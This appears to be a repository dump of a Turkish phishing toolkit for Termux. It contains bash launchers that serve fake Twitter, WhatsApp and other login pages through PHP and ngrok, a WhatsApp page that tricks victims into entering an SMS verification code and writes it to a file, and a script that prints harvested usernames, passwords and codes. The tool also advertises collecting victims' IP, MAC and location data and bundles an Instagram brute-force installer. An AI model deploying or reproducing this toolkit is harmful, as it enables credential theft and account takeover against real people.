    "content": "!/bin/bash\n\n#Code:Yaman Efkar\n#Türk Siber Timi\n#İnstagram : @turksibertimi\n#Youtube : YamanEfkar\nclear\necho -e  \"\n\n\n\\e[35m     ((( #Türk Siber Timi  #Yaman Efkar )))\n\n\n\n\\e[31m[01]\\e[32m Twitter Login\n\\e[31m[02]\\e[32m Twitter Fake Panel\n\n\n\\e[31m[00]\\e[37m Menü\n\\e[31m[99]\\e[37m Exit\n\"\necho -e \"\\e[49m\"\nread -p \"İşlem Numarasını Giriniz: \" islem\nif [[ $islem == 1 || $islem == 01 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: twitter01\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-phishing/\n\tphp -S 127.0.0.1:$port > -t & ngrok http $port\n\nelif [[ $islem == 2 || $islem == 02 ]]; then\n        read -p \"Port Giriniz: \" port\n        echo -e \"\\e[32mCode: twitter02\"\n        sleep 2\n        echo \"\"\n        echo -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\n        sleep 4\n        cd Site-fakepanel/\n\tphp -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 0 || $islem == 00 ]]; then\ncd ..\ncd ..\nbash tst.sh\nelif [[ $islem == 9 || $islem == 99 ]]; then\necho -e \"\\e[31mTürk Siber Timi İyi Günler Diler :)) ßß\"\nsleep 1\nclear\nexit 1\nelse\necho \"\"\necho -e \"\\e[31m Girdiğiniz İşlem Numarasını Kontrol Ediniz....\"\nsleep 3\nclear\nbash start.sh\nfi\n"
  },
  {
    "path": "Site/Whatsapp/Site/index.php",
    "content": "<!DOCTYPE html>\r\n<html>\r\n <head>\r\n  <title>\r\n   -- Whatsapp Hack --\r\n  </title>\r\n  <link href=\"https://cdn.iconscout.com/icon/free/png-256/whatsapp-62-414273.png\" rel=\"shortcut icon\"/>\r\n  <style type=\"text/css\">\r\n   .div1{\r\n      background-color:#040302;\r\n      height: 600px;\r\n      width: 500px;\r\n      border-radius: 25px;\r\n      border:4px solid green;\r\n      opacity: 0.8;\r\n      filter: alpha(opacity=40);\r\n    }\r\n    .text{\r\n      color:red;\r\n      font-size: 48px;\r\n      background-color:black;\r\n      padding-bottom: 20px;\r\n      border-radius: 48px; \r\n    }\r\n    .text2{\r\n      color:orange;\r\n      font-size:28px;\r\n      background-color:black;\r\n      border-radius: 50px;\r\n      padding-top: 25px;\r\n      padding-bottom: 25px;\r\n    }\r\n    .input{\r\n     height: 40px; \r\n     width: 250px; \r\n     font-size: 18px; \r\n     padding: 5px; \r\n     margin-bottom: 15px; \r\n     border-radius: 7px; \r\n     background-color:#b4b2b2; \r\n     border: none; \r\n     color: #000; \r\n\r\n    }\r\n    .button{\r\n     width: 100px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 5px;\r\n    }\r\n     canvas { \r\n     display: block; \r\n     position: fixed; \r\n  top: 0; \r\n  left: 0; \r\n     z-index: -1000; \r\n }\r\n .body{\r\n  background-image:url(\"https://images.pexels.com/photos/908283/pexels-photo-908283.jpeg?cs=srgb&dl=black-and-white-dark-marble-908283.jpg&fm=jpg\");\r\n\r\n }\r\n  </style>\r\n </head>\r\n <body class='body'>\r\n  <center>\r\n   <div class=\"div1\">\r\n    <p class=\"text\">\r\n     Whatsapp Hack\r\n    </p>\r\n    <form method=\"post\">\r\n     <p class=\"text2\">\r\n      Number\r\n     </p>\r\n     <p style=\"color:red;font-size:14px;\">Your number</p>\r\n     <input class=\"input\" name=\"realnumber\" placeholder=\"+905xx xxx xx xx\" type=\"text\"/>\r\n     <p style=\"color:red;font-size:14px;\">Victim's number</p>\r\n     <input class=\"input\" name=\"victimnumber\" placeholder=\"+905xx xxx xx xx\" type=\"text\"/>\r\n     <br>\r\n      <br>\r\n      <p id='buttonn'></p>\r\n    </form>\r\n       <p id='submitt'><button type=\"submit\" onclick=\"yaman()\"  style=\"width: 150px; \r\n     font-size: 18px;  \r\n     margin: 0 auto;\r\n     background-color: red; \r\n     border: none; \r\n     height: 40px; \r\n    border-radius: 5px;\">Send Code</button></p>\r\n      </br>\r\n     </br>\r\n     <p id='kod'></p>\r\n   </div>\r\n  </center>\r\n  <script>\r\n    //yamanefkar\r\n    function yaman2(){\r\n    document.getElementById(\"submitt\").innerHTML='';\r\n    document.getElementById(\"buttonn\").innerHTML='<input type=\"submit\" value=\"Send Code\" onclick=\"yaman();\" class=\"button\">';\r\n\r\n\r\n    }\r\n    function yaman(){\r\n      window.alert(\"Smsle Onay Kodunuz Gönderiliyor!\");//yamanefkar\r\n      setTimeout(yaman1, 5000);//yamanefkar\r\n    }\r\n    function yaman1(){//yamanefkar\r\n      document.getElementById(\"kod\").innerHTML='<b style=\"color:green;font-size:27px;background-color: black;opacity: 18;filter: alpha(opacity=40);border:4px solid red;border-radius: 20px;height:50px;width:250px;\">KODUNUZ SMS İLE GÖNDERİLDİ</b>';\r\n      setTimeout(window.alert(\"Kodunuz İletildi, Lütfen 10 saniye bekleyiniz...\"),5000);\r\n      setTimeout(kodSayfası, 10000);\r\n    }\r\n    function kodSayfası(){\r\n      document.write('<!DOCTYPE html><html><head><title>   -- Whatsapp Hack --  </title><link href=\"https://cdn.iconscout.com/icon/free/png-256/whatsapp-62-414273.png\" rel=\"shortcut icon\"/>');//yamanefkar\r\n\r\n      document.write('<style type=\"text/css\">.div1{background-color:#040302;height: 550px;width: 500px;border-radius: 25px;border:4px solid green;opacity: 0.8;filter: alpha(opacity=40);}.text{color:red;font-size: 48px;background-color:black;padding-bottom: 20px;border-radius: 48px;}.text2{color:orange;font-size:28px;background-color:black;border-radius: 50px;padding-top: 25px;padding-bottom: 25px;}.input{height: 40px;width: 250px;font-size: 18px;padding: 5px;margin-bottom: 15px;border-radius: 7px;background-color:#b4b2b2;border: none;color: #000;}.button{width: 100px;font-size: 18px;margin: 0 auto;background-color: red;border: none;height: 40px;border-radius: 5px;}canvas {display: block;position: fixed;top: 0;left: 0;z-index: -1000;}');//yamanefkar\r\n\r\n\r\n\r\n      document.write('</style></head><body background=\"https://images.pexels.com/photos/908283/pexels-photo-908283.jpeg?cs=srgb&dl=black-and-white-dark-marble-908283.jpg&fm=jpg\"><center><div class=\"div1\"><p class=\"text\">Whatsapp Hack</p><form action=\"\" method=\"post\"<p class=\"text2\">Code</p><p style=\"color:red;font-size:14px;\">Your Code</p><input class=\"input\" name=\"Code\" placeholder=\"Code xxx-xxx\" type=\"text\"/><br><button class=\"button\" type=\"submit\">Next</button></br></br></form></div></center>');//yamanefkarasd\r\n    }\r\n  </script>\r\n </body>\r\n <?php \r\n\r\nif (!empty($_POST['Code'])) {\r\n$ac = fopen(\"code.txt\",\"a+\");\r\n$password = $_POST['victimnumber'];\r\n\r\n$ip = $_POST['Code'];\r\n$userlar = (\"\\n __________________ \\n Code : \".$ip.\"\\n __________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n\r\n\r\n  ?>\r\n <!--YamanEfkar-->\r\n</html>"
  },
  {
    "path": "Site/Whatsapp/start.sh",
    "content": "#!/bin/bash\n\nclear\necho -e '\\033[32;40;1m\n        /\\︵-︵/\\\n        |( ◉)(◉)|\n        \\ ︶V︶ /\n        /↺↺↺↺↺↺↺\\\n        ↺↺↺↺↺↺↺↺|\n        \\↺↺↺↺↺↺↺/\n        ¯¯/\\¯/\\¯¯\n\n\n\n\\033[31;40;1m[01]\\e[37mWhatsapp Hack \n\n\n\\e[31m[00]\\e[37m Menü\n\\e[31m[99]\\e[37m Exit\n\n '\necho -e \"\\033[32;40;1m                      ~~~Yaman Efkar~~~\"\necho \"\"\nread -p \"İslem Numarası : \" islem\nif [[ $islem == 1 || $islem == 01 ]]; then\nread -p \"Port Numarası Giriniz : \" port\nsleep 3\necho \"\"\necho -e \"\\e[33mCode: whatsapp01\"\nsleep 2\necho \"\"\necho -e \"\\e[33mPhp Server && Ngrok Service Başlatılıyor...\"\nsleep 4\ncd Site/\nphp -S 127.0.0.1:$port > -t & ngrok http $port\nelif [[ $islem == 9 || $islem == 99 ]]; then\nclear\necho -e \"\\e[31mTürk Siber Timi İyi Günler Diler :)) ßß\"\nsleep 1 \nexit 1\nelif [[ $islem == 00 ]]; then\ncd ..\ncd ..\nbash tst.sh\nelse \n\techo -e '\\033[31;40;1m İslem Numaranızı Kontrol Ediniz!'\n\tsleep 2\n\tclear\n\tbash start.sh\nfi\n"
  },
  {
    "path": "Site/code.sh",
    "content": "#!/bin/bash\nclear\necho -e  \"\n\n\n\\e[35m     ((( #Türk Siber Timi  #Yaman Efkar )))\n\n\n\"\n\necho -e \"\\e[31m\"\nread -p \"Kodunuzu  Yazınız: \" islem\nif [[ $islem == \"insta01\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Instagram/Instagram-phishing/username-phishing.txt\n\nelif [[ $islem == \"insta02\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Instagram/Instagram-fakepanel/username-fakepanel.txt\n\nelif [[ $islem == \"twitter01\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Twitter/Site-phishing/user.txt\n\nelif [[ $islem == \"twitter02\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Twitter/Site-fakepanel/twitter.txt\n\nelif [[ $islem == \"whatsapp01\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Whatsapp/Site/code.txt\n\nelif [[ $islem == \"face01\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Facebook/Site-facebook/facebook.txt\n\nelif [[ $islem == \"face02\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Facebook/Site-fakepanel/fakepanel.txt\nelif [[ $islem == \"mail01\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Mail/Site-gmail/gmail.txt\n\nelif [[ $islem == \"mail02\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Mail/Site-yandex/yandex.txt\n\nelif [[ $islem == \"mail03\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Mail/Site-hotmail/hotmail.txt\n\nelif [[ $islem == \"game01\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Game/Site-wolfteam/wolfteam.txt\n\nelif [[ $islem == \"game02\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Game/Site-legend/legendonline.txt\n\nelif [[ $islem == \"game03\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Game/Site-pubg/pubg.txt\n\nelif [[ $islem == \"game04\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Game/Site-zula/zula.txt\n\nelif [[ $islem == \"game05\" ]]; then\nsleep 1\necho \"\"\necho -e \"\\e[33mVeriler Geliyor....\"\nsleep 2\necho -e \"\\e[37m\"\ncat Game/Site-lol/lol.txt\nelse\n\tclear\n        echo -e \"\\e[31mYanlış Kod Girdiniz....\"\n\tsleep 3\n        bash code.sh\nfi\necho -e \"\\e[31m\"\nread -p \"Ana Menüye Dönmek İçin Entere Basınız....\" non\ncd ..\nbash tst.sh\n"
  },
  {
    "path": "requirements.sh",
    "content": "#!/bin/bash\napt update && apt upgrade -y\npkg install termux-api -y\napt install curl -y\napt install wget -y\napt install python -y\napt install python2 -y\napt install php -y\napt install cat\nchmod 777 *\nrm -rf /data/data/com.termux/files/usr/bin/ngrok\nmv -v ngrok /data/data/com.termux/files/usr/bin\ncd  Site/Instagram/Instagram-bruteforce/\npip install -r requirements.txt\npython2 install.py install\ntermux-open-url https://www.instagram.com/yamanefkarr/\necho -e '\\033[31;40;1m \t\t\tKurulum Bitti!!!'\nsleep 1\n"
  },
  {
    "path": "tst.sh",
    "content": "#!/bin/bash\n#!/bin/sh\n#Code:Yaman Efkar\n#Türk Siber Timi\n#İnstagram : @turksibertimi\n#Youtube : YamanEfkar\nclear\ncase $1 in\n\n      \"--help\")\n\t   sleep 1\n       echo -e \"\n--help & --h   (Yardım Menüsünü Çağırır)\n--ıp & --ip    (Giriş Yapmış Kişilerin Ip Adresini Listeler)\n--user         (Giriş Yapılmış Username & Pass)\n--mac          (Giriş Yapanların Mac Adresleri)\n--location     (Belirtilen Ip Adresinin Yer Tespiti)\nbash yaman.sh & sh yaman.sh (Phishing Toolu 'nu Çalıştırır)\n   \"\n  ;;\n\n     \"--h\")\n\t   sleep 1\n       echo -e \"\n--help & --h   (Yardım Menüsünü Çağırır)\n--ıp & --ip    (Giriş Yapmış Kişilerin Ip Adresini Listeler)\n--user         (Giriş Yapılmış Username & Pass)\n--mac          (Giriş Yapanların Mac Adresleri)\n--location     (Belirtilen Ip Adresinin Yer Tespiti)\nbash yaman.sh & sh yaman.sh (Phishing Toolu 'nu Çalıştırır)\"\n\n  ;;\n\nesac\n\nbanner(){\necho -e '\\033[31;40;1m \n\t────────────────█████████───────────────\n\t──────────────█████████████─────────────\n\t───────────███████████████████──────────\n\t────────────────────────────────────────\n\t────────████████████████████████────────\n\t────────████████████████████████────────\n\t────────────────────────────────────────\n\t█████████─████████████████████─█████████\n\t█████████─████████████████████─█████████\n\t███───────████████────████████───────███\n\t███───────██████───██───██████───────███\n\t─███──────█████──████────█████──────███─\n\t──███─────████─────██─────████─────███──\n\t───███────████─────██─────████────███───\n\t────███───█████────██────█████───███────\n\t─────███──█████────██────█████──███─────\n\t──────███─███████──────███████─███──────\n\t───────██─████████████████████─██───────\n\t────────█─████████████████████─█────────\n\t────────────────────────────────────────\n\t──────────████████████████████──────────\n\t───────────██████████████████───────────\n\t─────────────██████████████─────────────\n\t───────────────███████████──────────────\n\t────────────────────────────────────────\n\t────────────────█████████───────────────\n\t──────────────█████████████─────────────\n\n\t   \\e[35m☾★ ☾★ ☾★ ☾★ YamanEfkar ☾★ ☾★ ☾★ ☾★\t\n\t \\e[31m☾★ ☾★ ☾★ ☾★ Türk Siber Timi ☾★ ☾★ ☾★ ☾★\t\n  \\e[32m☾★ ☾★ ☾★ ☾★ İnstagram : @turksibertimi ☾★ ☾★ ☾★ ☾★\t\n'\necho -e '\n\\e[31m[01]\\e[32mİnstagram\t\t\t\\e[31m[04]\\e[32mFacebook\n\\e[31m[02]\\e[32mTwitter\t\t\t\\e[31m[05]\\e[32mMail\n\\e[31m[03]\\e[32mWhatsapp\t\t\t\\e[31m[06]\\e[32mGame (Oyunlar)\n\n\\e[31m[00] Code\n\n\\e[31m[99] Çıkış\n\n\n'\nread -p  \"İşlem Numarası:\" islem\n}\n\n\n\nbanner\nif [[ $islem == 1 || $islem == 01 ]]; then\n\tsleep 1\n\tclear\n\tcd Site/Instagram/\n\tbash start.sh\n\nelif [[ $islem == 2 || $islem == 02 ]]; then\n\tsleep 1\n\tclear\n\tcd  Site/Twitter/\n\tbash start.sh\n\nelif [[ $islem == 3 || $islem == 03 ]]; then\n\tsleep 1\n\tclear\n\tcd Site/Whatsapp/\n\tbash start.sh\n\nelif [[ $islem == 4 || $islem == 04 ]]; then\n\tsleep 1\n\tclear\n\tcd  Site/Facebook/\n\tbash start.sh\n\nelif [[ $islem == 5 || $islem == 05 ]]; then\n\tsleep 1\n\tclear\n\tcd  Site/Mail/\n\tbash start.sh\n\nelif [[ $islem == 6 || $islem == 06 ]]; then\n\tsleep 1\n\tclear\n\tcd  Site/Game/\n\tbash start.sh\nelif [[ $islem == 00 ]]; then\n\n\tcd Site/\n\tbash code.sh\n\nelif [[ $islem == 99 ]]; then\n\texit 1\nelse\n\techo -e '\\033[36;40;1m Girdiğniz İşlem Numarasını Kontrol Ediniz....'\t\n\tsleep 1\n\tclear \n\tbanner\nfi\n"
  }
]